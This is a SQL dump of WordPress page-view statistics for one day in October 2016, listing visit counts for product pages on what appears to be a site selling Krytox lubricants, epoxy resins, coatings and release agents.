INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/', '2016-10-26', 3, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ab/', '2016-10-26', 2, 643); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-26', 6, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-26', 8, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-prepare-bearings/', '2016-10-26', 2, 2507); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication/', '2016-10-26', 2, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/', '2016-10-26', 5, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-214/', '2016-10-26', 2, 821); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-224/', '2016-10-26', 2, 847); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a4/', '2016-10-26', 3, 1014); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-26', 2, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/', '2016-10-26', 2, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-225/', '2016-10-26', 2, 848); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a5/', '2016-10-26', 3, 1012); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-26', 2, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-26', 2, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-26', 6, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/varnish-conformal-coating/', '2016-10-26', 2, 622); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness/', '2016-10-26', 2, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-202/', '2016-10-26', 2, 783); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-203/', '2016-10-26', 2, 784); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/', '2016-10-26', 3, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-223/', '2016-10-26', 3, 844); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-26', 2, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-sx/', '2016-10-26', 2, 671); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-ac/', '2016-10-26', 2, 672); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-acx/', '2016-10-26', 2, 674); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-26', 4, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xht-500/', '2016-10-26', 2, 707); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a5/', '2016-10-26', 2, 998); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506/', '2016-10-26', 2, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/', '2016-10-26', 2, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1525/', '2016-10-26', 2, 954); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/', '2016-10-26', 2, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-10-26', 3, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2245/', '2016-10-26', 2, 714); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/', '2016-10-26', 2, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2045/', '2016-10-26', 3, 713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2e45/', '2016-10-26', 2, 717); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2a45/', '2016-10-26', 3, 715); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/', '2016-10-26', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-xht-takes-heat/', '2016-10-26', 2, 2375); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-26', 5, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-10-26', 2, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-26', 3, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-26', 5, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants/', '2016-10-26', 3, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/', '2016-10-26', 3, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-26', 3, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-26', 3, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-26', 3, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-10-26', 2, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/', '2016-10-26', 2, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters/', '2016-10-26', 2, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-26', 9, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-26', 3, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-26', 2, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-26', 7, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-26', 8, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-26', 8, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/', '2016-10-26', 2, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/', '2016-10-26', 2, 467); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milsolv-medical-solvents/', '2016-10-26', 2, 473); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/millube-perfluorinated-synthetic-lubricants/', '2016-10-26', 2, 468); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/', '2016-10-26', 4, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/', '2016-10-26', 12, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88-radical-initiator/', '2016-10-26', 2, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agent/', '2016-10-26', 4, 400); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agents/', '2016-10-26', 2, 297); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rubber-molding-release-agents/', '2016-10-26', 3, 419); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rubber-molding-release-agent/', '2016-10-26', 2, 293); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/mold-release-agent/', '2016-10-26', 3, 423); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/composite-mold-release-agent/', '2016-10-26', 2, 290); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/', '2016-10-26', 2, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents-2/?add_to_wishlist=425', '2016-10-26', 2, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/', '2016-10-26', 3, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/', '2016-10-26', 4, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/universal-ptfe-release-agent/', '2016-10-26', 3, 305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/', '2016-10-26', 4, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/', '2016-10-26', 3, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/', '2016-10-26', 2, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-sion/?add_to_wishlist=1287', '2016-10-26', 2, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-suprion/', '2016-10-26', 2, 1344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240aa/', '2016-10-26', 2, 642); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ad/', '2016-10-26', 2, 645); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/?add_to_wishlist=638', '2016-10-26', 2, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ab/?add_to_wishlist=643', '2016-10-26', 2, 643); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/?add_to_wishlist=644', '2016-10-26', 2, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-246/', '2016-10-26', 2, 1088); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-407/', '2016-10-26', 2, 1111); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/?add_to_wishlist=788', '2016-10-26', 2, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-214/?add_to_wishlist=821', '2016-10-26', 2, 821); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-212/', '2016-10-26', 2, 819); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-224/?add_to_wishlist=847', '2016-10-26', 2, 847); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-222/', '2016-10-26', 2, 846); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a4/?add_to_wishlist=1014', '2016-10-26', 2, 1014); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a6/', '2016-10-26', 3, 1015); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?add_to_wishlist=789', '2016-10-26', 2, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/?add_to_wishlist=822', '2016-10-26', 2, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-216/', '2016-10-26', 2, 823); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-225/?add_to_wishlist=848', '2016-10-26', 2, 848); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a5/?add_to_wishlist=1012', '2016-10-26', 2, 1012); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a3/', '2016-10-26', 3, 1011); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal/', '2016-10-26', 1, 733); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-coating/', '2016-10-26', 1, 734); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/', '2016-10-26', 1, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coating-mil-spec/', '2016-10-26', 1, 637); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/', '2016-10-26', 5, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-electronic-coating/', '2016-10-26', 1, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-conformal-coatings/', '2016-10-26', 3, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/mil-spec-urethane-conformal-coating/', '2016-10-26', 1, 190); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/', '2016-10-26', 1, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-472s/', '2016-10-26', 2, 738); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/varnish-conformal-coating/?add_to_wishlist=622', '2016-10-26', 1, 622); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/', '2016-10-26', 5, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-101/', '2016-10-26', 1, 436); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-102/', '2016-10-26', 1, 437); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-26', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/', '2016-10-26', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/', '2016-10-26', 1, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-202/?add_to_wishlist=783', '2016-10-26', 1, 783); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-201/', '2016-10-26', 3, 769); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-203/?add_to_wishlist=784', '2016-10-26', 1, 784); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/?add_to_wishlist=790', '2016-10-26', 1, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-207/', '2016-10-26', 1, 814); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-220/', '2016-10-26', 2, 410); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-221/', '2016-10-26', 1, 843); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/', '2016-10-26', 1, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-223/?add_to_wishlist=844', '2016-10-26', 1, 844); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/?add_to_wishlist=850', '2016-10-26', 1, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-sx/?add_to_wishlist=671', '2016-10-26', 1, 671); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-s/', '2016-10-26', 1, 659); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-ac/?add_to_wishlist=672', '2016-10-26', 1, 672); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-acx/?add_to_wishlist=674', '2016-10-26', 1, 674); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?add_to_wishlist=440', '2016-10-26', 1, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xht-500/?add_to_wishlist=707', '2016-10-26', 1, 707); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xht-1000/', '2016-10-26', 1, 708); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a5/?add_to_wishlist=998', '2016-10-26', 1, 998); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a6/', '2016-10-26', 1, 999); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a4/', '2016-10-26', 1, 997); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/', '2016-10-26', 2, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506/?add_to_wishlist=943', '2016-10-26', 1, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/?add_to_wishlist=944', '2016-10-26', 1, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1525/?add_to_wishlist=954', '2016-10-26', 1, 954); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/?add_to_wishlist=954', '2016-10-26', 1, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/?add_to_wishlist=944', '2016-10-26', 1, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/?add_to_wishlist=943', '2016-10-26', 1, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/', '2016-10-26', 1, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2245/?add_to_wishlist=714', '2016-10-26', 1, 714); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/?add_to_wishlist=439', '2016-10-26', 1, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2045/?add_to_wishlist=713', '2016-10-26', 1, 713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2e45/?add_to_wishlist=717', '2016-10-26', 1, 717); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2a45/?add_to_wishlist=715', '2016-10-26', 1, 715); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/', '2016-10-26', 2, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-210/', '2016-10-26', 2, 402); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-211/', '2016-10-26', 1, 818); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-217/', '2016-10-26', 1, 824); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-26', 5, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-26', 1, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/cobra-duster/', '2016-10-26', 1, 1851); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rust-inhibitor/', '2016-10-26', 1, 1724); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/penetrating-oil/', '2016-10-26', 1, 1729); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze/', '2016-10-26', 2, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conductive-coating/', '2016-10-26', 1, 1722); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/spray-trigger/', '2016-10-26', 1, 1852); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/?add_to_wishlist=790', '2016-10-26', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-agl-683/', '2016-10-26', 3, 1072); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/?add_to_wishlist=1072', '2016-10-26', 2, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-226-fg/', '2016-10-26', 1, 2741); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-227-fg/', '2016-10-26', 1, 2746); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-250ad/', '2016-10-26', 1, 648); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/', '2016-10-26', 2, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tm7/', '2016-10-26', 1, 1077); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/?add_to_wishlist=1077', '2016-10-26', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-250ac/', '2016-10-26', 2, 647); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-250az/', '2016-10-26', 1, 646); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-280ab/', '2016-10-26', 2, 649); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-280ac/', '2016-10-26', 1, 651); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283aa/', '2016-10-26', 1, 653); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283ab/', '2016-10-26', 1, 654); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283ac/', '2016-10-26', 1, 655); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283ad/', '2016-10-26', 1, 656); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143aa/', '2016-10-26', 3, 579); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ab/', '2016-10-26', 1, 581); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ac/', '2016-10-26', 1, 582); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ad/', '2016-10-26', 1, 583); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ay/', '2016-10-26', 1, 580); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143az/', '2016-10-26', 2, 452); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-26', 2, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conformal-coating-stripper/', '2016-10-26', 4, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-3522-w-60/', '2016-10-26', 1, 1031); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-5003-w-55/', '2016-10-26', 1, 1033); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-5522-wy-55/', '2016-10-26', 1, 1035); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-wd-510/', '2016-10-26', 1, 1042); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3015/', '2016-10-26', 1, 1067); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3030/', '2016-10-26', 1, 1164); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3046/', '2016-10-26', 1, 1166); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3055/', '2016-10-26', 1, 1168); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3125/', '2016-10-26', 2, 1866); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3140/', '2016-10-26', 2, 1868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3155/', '2016-10-26', 1, 1065); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3155-2/', '2016-10-26', 1, 1178); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3164/', '2016-10-26', 1, 1181); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3223/', '2016-10-26', 2, 1183); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3234/', '2016-10-26', 1, 1185); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3245/', '2016-10-26', 1, 1187); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3253/', '2016-10-26', 1, 1865); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3270/', '2016-10-26', 1, 1063); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3271/', '2016-10-26', 1, 1189); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3274/', '2016-10-26', 1, 1191); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3282/', '2016-10-26', 1, 1193); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3290/', '2016-10-26', 1, 1198); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3295/', '2016-10-26', 1, 1209); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3370/', '2016-10-26', 1, 1061); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-26', 3, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/eponex-1510/', '2016-10-26', 1, 986); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant', '2016-10-26', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-58005/', '2016-10-26', 1, 977); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-58034/', '2016-10-26', 1, 994); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1163/', '2016-10-26', 1, 1019); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8021/', '2016-10-26', 1, 970); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1031/', '2016-10-26', 1, 948); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-164/', '2016-10-26', 1, 955); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-su-8/', '2016-10-26', 2, 952); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-813/', '2016-10-26', 1, 903); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8132/', '2016-10-26', 1, 912); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-26', 4, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8280/', '2016-10-26', 1, 891); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8281/', '2016-10-26', 1, 895); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-872/', '2016-10-26', 1, 900); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001f/', '2016-10-26', 1, 924); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1002f/', '2016-10-26', 2, 937); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1004f/', '2016-10-26', 1, 939); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1007f/', '2016-10-26', 1, 941); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001-x-75/', '2016-10-26', 1, 918); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-830/', '2016-10-26', 1, 882); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-825/', '2016-10-26', 1, 842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/', '2016-10-26', 1, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-26', 5, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-834/', '2016-10-26', 1, 885); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/', '2016-10-26', 2, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-26', 6, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-26', 7, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-505/', '2016-10-26', 1, 1270); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-71/', '2016-10-26', 1, 1230); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-116/', '2016-10-26', 1, 1212); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-61/', '2016-10-26', 1, 1069); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-62/', '2016-10-26', 1, 1216); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-107/', '2016-10-26', 1, 1227); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-48/', '2016-10-26', 1, 1221); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-68/', '2016-10-26', 1, 1224); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283az/', '2016-10-26', 1, 652); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-eg-2000/', '2016-10-26', 1, 967); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-eg-3000/', '2016-10-26', 1, 968); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-fpg-028/', '2016-10-26', 1, 984); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-fpg-182/', '2016-10-26', 1, 973); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8900/', '2016-10-26', 3, 868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8904/', '2016-10-26', 1, 878); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8906/', '2016-10-26', 1, 880); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8908/', '2016-10-26', 1, 881); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-plss/', '2016-10-26', 1, 888); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroguard-pca/', '2016-10-26', 1, 1428); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroguard-pro/', '2016-10-26', 1, 1435); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroguard-sg/', '2016-10-26', 1, 1431); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ks-1220/', '2016-10-26', 2, 2460); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-110xnb-copy/', '2016-10-26', 2, 1666); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-110xnb-copy/?wc-ajax=get_refreshed_fragments', '2016-10-26', 2, 1666); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a0/', '2016-10-26', 2, 1002); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a0/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1002); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a1/', '2016-10-26', 1, 1009); 
